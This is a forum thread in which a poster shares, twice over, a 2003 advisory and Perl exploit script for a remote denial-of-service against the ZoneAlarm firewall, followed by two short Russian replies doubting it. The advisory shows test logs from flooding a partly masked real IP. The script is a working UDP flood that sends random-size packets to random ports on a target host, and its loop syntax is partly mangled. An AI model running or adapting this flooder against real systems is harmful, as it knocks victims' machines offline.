# Overview : # # ZoneAlarm is a firewall software # package designed for Microsoft Windows # operating systems that blocks intrusion # attempts, trusted by millions, and has # advanced privacy features like worms, # Trojan horses, and spyware protection. # ZoneAlarm is distributed and maintained # by Zone Labs.http://www.zonelabs.com # # Details : # # ZoneAlarm was found vulnerable to a # serious vulnerability leading to a # remote Denial Of Service condition due # to failure to handle udp random # packets, if an attacker sends multiple # udp packets to multiple ports 0-65000, # the machine will hang up until the # attacker stop flooding. # # The following is a remote test done # under ZoneAlarm version 3.7.202 running # on windows xp home edition. # # on irc test1 joined running ZoneAlarm # version 3.7.202 with default # installation # # * test1 ([email protected].***.**) has joined #Hackology # # from a linux box : # # [root@mail DoS]# ping 62.251.***.** # PING 62.251.***.** (62.251.***.**) from # ***.***.**.** : 56(84) bytes of data. # # --- 62.251.***.** ping statistics --- # 7 packets transmitted, 0 received, 100% # loss, time 6017ms # # on irc # # -> [test1] PING # # [test1 PING reply]: 1secs # # Host is firewalled and up # # now lets try to dos # # --- ZoneAlarm Remote DoS Xploit # --- # --- Discovered & Coded By _6mO_HaCk # # [*] DoSing 62.251.***.** ... wait 1 # minute and then CTRL+C to stop # # [root@mail DoS]# # # after 2 minutes # # * test1 ([email protected].***.**) Quit (Ping timeout) # # I have made the same test on ZoneAlarm # Pro 4.0 Release running on windows xp # professional and i've got the same # result. # # Exploit released : 02/09/03 # # Vulnerable Versions : ALL # # Operating Systems : ALL Windows # # Successfully Tested on : # # ZoneAlarm version 3.7.202 / windows xp # home edition / windows 98. # # ZoneAlarm Pro 4.0 Release / windows xp # professional # # Vendor status : UNKOWN # # Solution : Shut down ZoneAlarm and wait # for an update. # # The following is a simple code written # in perl to demonstrate that, the code # is clean, it wont eat your cpu usage # and it doesnt need to be run as root # but you still have to use it at your # own risk and on your own machine or # remotly after you get permission. # # Big thanx go to D|NOOO and frost for # providing me windows boxes with # zonealarm for testing # # Greetz to ir7ioli, BlooDMASK # [email protected] # NRGY, Le_Ro| JT ghosted_ Securma, # anasoft SySiPh, phrack, DeV|L0Ty, # MajNouN |BiG-LuV| h4ckg1rl and all # my ppl here in Chicago and in Morocco # # Comments suggestions or additional info # feel free to contact me at # [email protected] # [email protected] #!/usr/bin/perl use Socket; system(clear); print "\n"; print "--- ZoneAlarm Remote DoS Xploit\n"; print "---\n"; print "--- Discovered & Coded By _6mO_HaCk\n"; print "\n"; if(!defined($ARGV[0])) { &usage } my ($target); $target=$ARGV[0]; my $ia = inet_aton($target) || die ("[-] Unable to resolve $target"); socket(DoS, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$target"); print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n"; for (; { $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");} # Overview : # # ZoneAlarm is a firewall software # package designed for Microsoft Windows # operating systems that blocks intrusion # attempts, trusted by millions, and has # advanced privacy features like worms, # Trojan horses, and spyware protection. # ZoneAlarm is distributed and maintained # by Zone Labs.http://www.zonelabs.com # # Details : # # ZoneAlarm was found vulnerable to a # serious vulnerability leading to a # remote Denial Of Service condition due # to failure to handle udp random # packets, if an attacker sends multiple # udp packets to multiple ports 0-65000, # the machine will hang up until the # attacker stop flooding. # # The following is a remote test done # under ZoneAlarm version 3.7.202 running # on windows xp home edition. # # on irc test1 joined running ZoneAlarm # version 3.7.202 with default # installation # # * test1 ([email protected].***.**) has joined #Hackology # # from a linux box : # # [root@mail DoS]# ping 62.251.***.** # PING 62.251.***.** (62.251.***.**) from # ***.***.**.** : 56(84) bytes of data. # # --- 62.251.***.** ping statistics --- # 7 packets transmitted, 0 received, 100% # loss, time 6017ms # # on irc # # -> [test1] PING # # [test1 PING reply]: 1secs # # Host is firewalled and up # # now lets try to dos # # --- ZoneAlarm Remote DoS Xploit # --- # --- Discovered & Coded By _6mO_HaCk # # [*] DoSing 62.251.***.** ... wait 1 # minute and then CTRL+C to stop # # [root@mail DoS]# # # after 2 minutes # # * test1 ([email protected].***.**) Quit (Ping timeout) # # I have made the same test on ZoneAlarm # Pro 4.0 Release running on windows xp # professional and i've got the same # result. # # Exploit released : 02/09/03 # # Vulnerable Versions : ALL # # Operating Systems : ALL Windows # # Successfully Tested on : # # ZoneAlarm version 3.7.202 / windows xp # home edition / windows 98. # # ZoneAlarm Pro 4.0 Release / windows xp # professional # # Vendor status : UNKOWN # # Solution : Shut down ZoneAlarm and wait # for an update. # # The following is a simple code written # in perl to demonstrate that, the code # is clean, it wont eat your cpu usage # and it doesnt need to be run as root # but you still have to use it at your # own risk and on your own machine or # remotly after you get permission. # # Big thanx go to D|NOOO and frost for # providing me windows boxes with # zonealarm for testing # # Greetz to ir7ioli, BlooDMASK # [email protected] # NRGY, Le_Ro| JT ghosted_ Securma, # anasoft SySiPh, phrack, DeV|L0Ty, # MajNouN |BiG-LuV| h4ckg1rl and all # my ppl here in Chicago and in Morocco # # Comments suggestions or additional info # feel free to contact me at # [email protected] # [email protected] #!/usr/bin/perl use Socket; system(clear); print "\n"; print "--- ZoneAlarm Remote DoS Xploit\n"; print "---\n"; print "--- Discovered & Coded By _6mO_HaCk\n"; print "\n"; if(!defined($ARGV[0])) { &usage } my ($target); $target=$ARGV[0]; my $ia = inet_aton($target) || die ("[-] Unable to resolve $target"); socket(DoS, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$target"); print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n"; for (; { $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");} вот нашол пару експлойтов для zone alarm ... они не новые . интересно узнать ваше мнение реально ли ?
я скептически отношусь ко всем публичным эксплойтам во всяком в том виде в котором они выкладываютса ... но чем чёрт нешутит... хотя вызов отказа в обслуживании самово фарейвла(так было в описании) звучит както фантастично
Дя блин ребята обычная Dos - атака. Его комп с фаирволом ты может быть и повесишь, но при этом на протяжении атаки будешь сам висеть